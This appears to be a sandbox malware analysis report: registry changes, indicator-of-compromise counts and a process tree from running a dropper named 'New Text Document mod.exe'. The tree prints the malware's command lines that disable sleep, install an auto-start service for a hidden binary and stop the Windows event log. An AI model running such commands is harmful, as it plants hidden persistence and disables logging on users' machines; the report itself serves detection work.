SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E37A73F8-FB01-43DC-914E-AAEE76095AB9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000abe06cda5dc5da01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-10 = "Microsoft Hangul Decomposition Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-7 = "Microsoft Devanagari to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\acppage.dll,-6003 = "Windows Command Script" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-9 = "Microsoft Bengali to Latin Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000092148fd75dc5da01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3860 schtasks.exe 7028 schtasks.exe 1408 schtasks.exe 4328 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 8 chrome.exe 8 chrome.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 6484 uYtF.exe 5888 wfbrmcwrltkl.exe 5888 wfbrmcwrltkl.exe 5888 wfbrmcwrltkl.exe 5888 wfbrmcwrltkl.exe 5888 wfbrmcwrltkl.exe 3524 natura.exe 3216 nautr.exe 6112 powershell.exe 6112 powershell.exe 3524 natura.exe 3216 nautr.exe 3524 natura.exe 3524 natura.exe 6112 powershell.exe 3216 nautr.exe 2364 etuamactyjne.exe 3216 nautr.exe 2364 etuamactyjne.exe 1008 taskmgr.exe 1008 taskmgr.exe 5780 pseaptzkxyms.exe 3432 conhost.exe 3432 conhost.exe 1008 taskmgr.exe 1008 taskmgr.exe 4640 supportoxmr.exe 3428 etc test.exe 3432 conhost.exe 3432 conhost.exe 3432 conhost.exe 3432 conhost.exe 1008 taskmgr.exe 1008 taskmgr.exe 6568 powershell.exe 6568 powershell.exe 1008 taskmgr.exe 1008 taskmgr.exe 5412 powershell.exe 5412 powershell.exe 3432 conhost.exe 3432 conhost.exe 1008 taskmgr.exe 1008 taskmgr.exe 3432 conhost.exe 3432 conhost.exe 1008 taskmgr.exe 3432 conhost.exe 3432 conhost.exe 1008 taskmgr.exe 6568 powershell.exe 3432 conhost.exe 3432 conhost.exe 5412 powershell.exe 1008 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 6080 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: SeShutdownPrivilege 8 chrome.exe Token: SeCreatePagefilePrivilege 8 chrome.exe Token: 33 1444 SearchIndexer.exe Token: SeIncBasePriorityPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 1444 SearchIndexer.exe Token: SeRestorePrivilege 5776 7zG.exe Token: 35 5776 7zG.exe Token: SeSecurityPrivilege 5776 7zG.exe Token: SeSecurityPrivilege 5776 7zG.exe Token: SeRestorePrivilege 5880 7zG.exe Token: 35 5880 7zG.exe Token: SeSecurityPrivilege 5880 7zG.exe Token: SeSecurityPrivilege 5880 7zG.exe Token: SeRestorePrivilege 5972 7zG.exe Token: 35 5972 7zG.exe Token: SeSecurityPrivilege 5972 7zG.exe Token: SeSecurityPrivilege 5972 7zG.exe Token: SeDebugPrivilege 936 New Text Document mod.exe Token: SeDebugPrivilege 6316 4363463463464363463463463.exe Token: SeDebugPrivilege 5136 taskkill.exe Token: SeShutdownPrivilege 5556 powercfg.exe Token: SeCreatePagefilePrivilege 5556 powercfg.exe Token: SeShutdownPrivilege 5408 powercfg.exe Token: SeCreatePagefilePrivilege 5408 powercfg.exe Token: SeShutdownPrivilege 5600 powercfg.exe Token: SeCreatePagefilePrivilege 5600 powercfg.exe Token: SeShutdownPrivilege 5680 powercfg.exe Token: SeCreatePagefilePrivilege 5680 powercfg.exe Token: SeShutdownPrivilege 5840 powercfg.exe Token: SeCreatePagefilePrivilege 5840 powercfg.exe Token: SeShutdownPrivilege 5856 powercfg.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 5776 7zG.exe 5880 7zG.exe 5972 7zG.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 8 chrome.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe 1008 taskmgr.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 6080 OpenWith.exe 4820 RegAsm.exe 5256 %E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe 6904 MsBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 8 wrote to memory of 4404 8 chrome.exe 90 PID 8 wrote to memory of 4404 8 chrome.exe 90 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 1124 8 chrome.exe 91 PID 8 wrote to memory of 4788 8 chrome.exe 92 PID 8 wrote to memory of 4788 8 chrome.exe 92 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 PID 8 wrote to memory of 1592 8 chrome.exe 93 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip1⤵PID:2120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9523ab58,0x7ffa9523ab68,0x7ffa9523ab782⤵PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:22⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:82⤵PID:4788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:82⤵PID:1592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:2432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:4980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4296 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:3076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:82⤵PID:3052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4652 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:82⤵PID:1676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4152 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4600 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4712 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:12⤵PID:964
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4088
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
PID:3004
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵
- Modifies data under HKEY_USERS
PID:2680
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵PID:6308
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵PID:6760
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3504
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\themecpl.dll,OpenThemeAction C:\Windows\WinSxS\amd64_microsoft-windows-themefile-aero_31bf3856ad364e35_10.0.19041.1_none_2fe4331ee906f14a\aero.theme1⤵
- Modifies Control Panel
PID:4236
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6276:80:7zEvent209581⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5776
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap30411:108:7zEvent291⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5880
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6163:110:7zEvent259811⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5972
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6080 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document mod.exse2⤵PID:6140
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Users\Admin\Desktop\a\uYtF.exe"C:\Users\Admin\Desktop\a\uYtF.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6484 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "xjuumoinznsp"3⤵
- Launches sc.exe
PID:5696
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"3⤵
- Launches sc.exe
PID:5752
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5780
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "xjuumoinznsp"3⤵
- Launches sc.exe
PID:5824
